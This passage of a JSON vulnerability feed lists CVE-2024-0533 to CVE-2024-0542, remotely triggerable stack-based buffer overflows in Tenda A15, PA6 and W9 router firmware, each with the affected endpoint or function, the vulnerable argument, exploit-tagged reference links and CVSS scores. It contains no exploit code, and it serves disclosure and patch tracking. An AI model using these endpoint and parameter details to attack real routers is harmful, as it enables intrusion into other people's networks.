"cpe:2.3:h:tenda:a15:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T02:15Z", "lastModifiedDate" : "2025-02-16T09:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0533", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.devname.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250703", "name" : "https://vuldb.com/?ctiid.250703", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250703", "name" : "https://vuldb.com/?ctiid.250703", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250703", "name" : "https://vuldb.com/?id.250703", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250703", "name" : "https://vuldb.com/?id.250703", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda A15 15.13.07.13. It has been rated as critical. This issue affects some unknown processing of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250703. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:a15_firmware:15.13.07.13:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:a15:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0534", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/A15/SetOnlineDevName.mac.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250704", "name" : "https://vuldb.com/?ctiid.250704", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250704", "name" : "https://vuldb.com/?ctiid.250704", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250704", "name" : "https://vuldb.com/?id.250704", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250704", "name" : "https://vuldb.com/?id.250704", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Tenda A15 15.13.07.13. Affected is an unknown function of the file /goform/SetOnlineDevName of the component Web-based Management Interface. The manipulation of the argument mac leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250704. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:a15_firmware:15.13.07.13:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:a15:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0535", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/PA6/2/README.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250705", "name" : "https://vuldb.com/?ctiid.250705", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250705", "name" : "https://vuldb.com/?ctiid.250705", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250705", "name" : "https://vuldb.com/?id.250705", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250705", "name" : "https://vuldb.com/?id.250705", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Tenda PA6 1.0.1.21. Affected by this vulnerability is the function cgiPortMapAdd of the file /portmap of the component httpd. The manipulation of the argument groupName leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250705 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:pa6_firmware:1.0.1.21:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:pa6:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0536", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/1/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250706", "name" : "https://vuldb.com/?ctiid.250706", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250706", "name" : "https://vuldb.com/?ctiid.250706", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250706", "name" : "https://vuldb.com/?id.250706", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250706", "name" : "https://vuldb.com/?id.250706", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Tenda W9 1.0.0.7(4456). Affected by this issue is the function setWrlAccessList of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250706 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w9_firmware:1.0.0.7\\(4456\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w9:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0537", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/2/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250707", "name" : "https://vuldb.com/?ctiid.250707", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250707", "name" : "https://vuldb.com/?ctiid.250707", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250707", "name" : "https://vuldb.com/?id.250707", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250707", "name" : "https://vuldb.com/?id.250707", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Tenda W9 1.0.0.7(4456). This affects the function setWrlBasicInfo of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250707. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w9_firmware:1.0.0.7\\(4456\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w9:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0538", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/3/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250708", "name" : "https://vuldb.com/?ctiid.250708", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250708", "name" : "https://vuldb.com/?ctiid.250708", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250708", "name" : "https://vuldb.com/?id.250708", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250708", "name" : "https://vuldb.com/?id.250708", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Tenda W9 1.0.0.7(4456) and classified as critical. This vulnerability affects the function formQosManage_auto of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250708. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w9_firmware:1.0.0.7\\(4456\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w9:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T04:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0539", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/4/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250709", "name" : "https://vuldb.com/?ctiid.250709", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250709", "name" : "https://vuldb.com/?ctiid.250709", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250709", "name" : "https://vuldb.com/?id.250709", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250709", "name" : "https://vuldb.com/?id.250709", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda W9 1.0.0.7(4456) and classified as critical. This issue affects the function formQosManage_user of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250709 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w9_firmware:1.0.0.7\\(4456\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w9:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0540", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/5/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250710", "name" : "https://vuldb.com/?ctiid.250710", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250710", "name" : "https://vuldb.com/?ctiid.250710", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250710", "name" : "https://vuldb.com/?id.250710", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250710", "name" : "https://vuldb.com/?id.250710", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been classified as critical. Affected is the function formOfflineSet of the component httpd. The manipulation of the argument ssidIndex leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250710 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w9_firmware:1.0.0.7\\(4456\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w9:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0541", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/6/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250711", "name" : "https://vuldb.com/?ctiid.250711", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250711", "name" : "https://vuldb.com/?ctiid.250711", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250711", "name" : "https://vuldb.com/?id.250711", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250711", "name" : "https://vuldb.com/?id.250711", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda W9 1.0.0.7(4456). It has been declared as critical. Affected by this vulnerability is the function formAddSysLogRule of the component httpd. The manipulation of the argument sysRulenEn leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250711. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:w9_firmware:1.0.0.7\\(4456\\):*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:w9:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-15T05:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0542", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md", "name" : "https://github.com/jylsec/vuldb/blob/main/Tenda/W9/7/README.md", "refsource" : "", "tags" : [ "Broken Link", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250712", "name" : "https://vuldb.com/?ctiid.250712", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.250712", "name" : "https://vuldb.com/?ctiid.250712", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.250712", "name" : "https://vuldb.com/?id.250712", "refsource" : "", "tags" : [ "Permissions Required", "Third Party 